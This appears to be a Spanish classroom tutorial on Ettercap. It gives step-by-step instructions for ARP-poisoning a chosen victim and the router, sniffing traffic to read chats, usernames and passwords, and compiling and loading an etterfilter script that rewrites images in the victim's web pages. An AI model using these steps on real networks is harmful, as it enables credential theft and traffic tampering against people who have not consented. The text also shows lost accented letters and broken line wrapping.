Ettercap:

Este programa que nos permite sniffear el trfico de red (capturar conversaciones, lectura de
paquetes) y obtener as las contraseas escritas por otros usuarios de nuestra red. Con el uso de
filtros se pueden manipular cabeceras de sitios web y modificar la informacin del FRON-END
Para instalacin en ambientes Linux (aunque la mayora de distribuciones ya las trae instaladas):
# apt-get install ettercap-gtk (instalacin con interfaz grfica)
Si solo desea instalar modo consola: # apt-get install ettercap
Arrancamos el ettercap (en caso de linux como root, ya que sino no nos permitir seleccionar la
interfaz de red a utilizar).
Para lanzar e programa: #ettercap-G (interfaz grfica)

o #ettercap-C (modo consola)

PROCEDIMIENTO PARA REALIZAR UN SCANEO A LA RED:

Pestaa Sniff>Unified Sniffing

Seleccionamos la interfaz que
despues le damos a "Aceptar".

est

conectada

la

red

que

queremos

sniffar,

Pestaa Host>Scan for hosts.

En la parte de abajo de la pantalla aparecera algo como " X hosts added to the hosts list..."
(X sera un numero correspondiente al numero de maquinas conectadas a la red).

Pestaa Host>Host list.

Ahora apareceran las IPs de las maquinas conectadas, hay que tener en cuenta que el router
tambin aparece (No aparece nuestro PC).
Seleccionamos la IP del ordenador a atacar y pulsamos "Add to Target 1", despus el router "Add to
Target 2".

Ahora ya tenemos los objetivos marcados, pero antes de dar el siguiente paso tenemos que tener
en cuenta que vamos a utilizar una tcnica llamada Man In The Middle (MITM) y lo que haremos
ser que todos los paquetes que van dirigidos al PC atacado pasen por nosotros, con lo que si
nosotros nos desconectamos sin detener el ataque MITM nuestra vctima se quedara sin conexin
por un tiempo, mientras se reinician las tablas arp.

Pestaa Mitm>ARP Poisoning. Ahora marcamos la pestaa "Sniff remote connections" y pulsamos
"Aceptar"

Pestaa Start>Start sniffing.

Con esto estaremos snifando el trfico de red.

Pestaa View>Connections. Aqu podemos ver todas las conexiones y hacemos doble click sobre
alguna podemos ver los datos que contiene, entre ellos conversaciones del messenger, usuarios y
contraseas, etc. (ESTA ACIVIDAD ES LA QUE SE COORDINA E EL AULA PARA EFECTOS DE REALIZAR
LAS PRCTICAS QUE ORIETE EL DOCENTE).

AHORA UNA BREVE INTRODUCCION DE COMO USAR FILTROS:

Este filtro se utiliza para cambiar las imagenes de la maquina a la que le hayamos hecho el man in
the
middle.
Primero tenemos que obtener el script del filtro, para esto vamos a la siguiente pagina y copiamos
el script.

#########################################################################
###
#
#
# Jolly Pwned -- ig.filter -- filter source
file
#
#
#
# By Irongeek. based on code from ALoR &
NaGA
#
# Along with some help from Kev and
jon.dmml
#
# http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833
#
#
#
# This program is free software; you can redistribute it and/or
modify
#
# it under the terms of the GNU General Public License as published
by
#
# the Free Software Foundation; either version 2 of the License,
or
#
# (at your option) any later
version.
#
#
#
#########################################################################
###
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img
src=\"http://www.irongeek.com/images/jollypwn.png\" ");
replace("IMG SRC=", "img
src=\"http://www.irongeek.com/images/jollypwn.png\" ");

msg("Filter Ran.\n");
}

Ahora modificamos la direccin de las imgenes por las que nosotros queramos, por ejemplo la de
portalhacker.net, quedara as:

if (ip.proto == TCP && tcp.src == 80) {

replace("img src=", "img
src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\"
");
replace("IMG SRC=", "img
src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\"
");
msg("Filter Ran.\n");
}

Lo siguiente ser guardar el script con extensin .filter, por ejemplo imagen.filter.
Una vez hecho esto abrimos una consola y vamos al directorio donde tenemos el imagen.filter. Una
vez all ponemos y se compilara el filtro:

etterfilter imagen.filter -o imagen.ef

Con esto nos generara el imagen.ef. Una vez creado lo copiaremos al directorio de ettercap
/usr/share/ettercap

Ahora arrancamos ettercap y realizamos el MITM. Durante el MITM vamos a la pestaa filters->load
a filter.
Una vez aqu seleccionamos el archivo imagen.ef y pulsamos aceptar. Con esto ya estar el filtro
aplicado y las imgenes que vea la victima sern sustituidas por las que nosotros queramos.

Fuente del filtro:

http://www.irongeek.com/i.php?page=security/ettercapfilter